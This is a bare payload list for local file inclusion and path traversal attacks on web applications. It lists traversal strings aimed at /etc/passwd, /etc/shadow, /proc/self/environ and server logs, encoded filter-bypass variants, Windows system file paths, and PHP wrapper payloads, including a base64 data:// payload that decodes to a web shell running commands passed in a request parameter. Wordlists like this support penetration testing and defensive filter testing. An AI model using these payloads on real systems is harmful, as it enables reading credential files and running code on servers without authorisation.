# LFI - Path Traversal Payloads
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/proc/self/environ
/proc/self/cmdline
/var/log/apache2/access.log
/var/log/nginx/access.log
/var/log/apache/access.log
C:\Windows\win.ini
C:\boot.ini
C:\Windows\System32\drivers\etc\hosts
../../../windows/win.ini
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%c0%af..%c0%af..%c0%afetc/passwd
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd
....//....//....//etc/passwd
..\/..\/..\/etc/passwd
..%00/..%00/..%00/etc/passwd
../../../etc/passwd%00.jpg
../../../etc/passwd%00.png
/proc/self/fd/0
/proc/self/status
/proc/self/maps
php://filter/convert.base64-encode/resource=/etc/passwd
php://input
expect://id
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
..0x2f..0x2f..0x2fetc/passwd
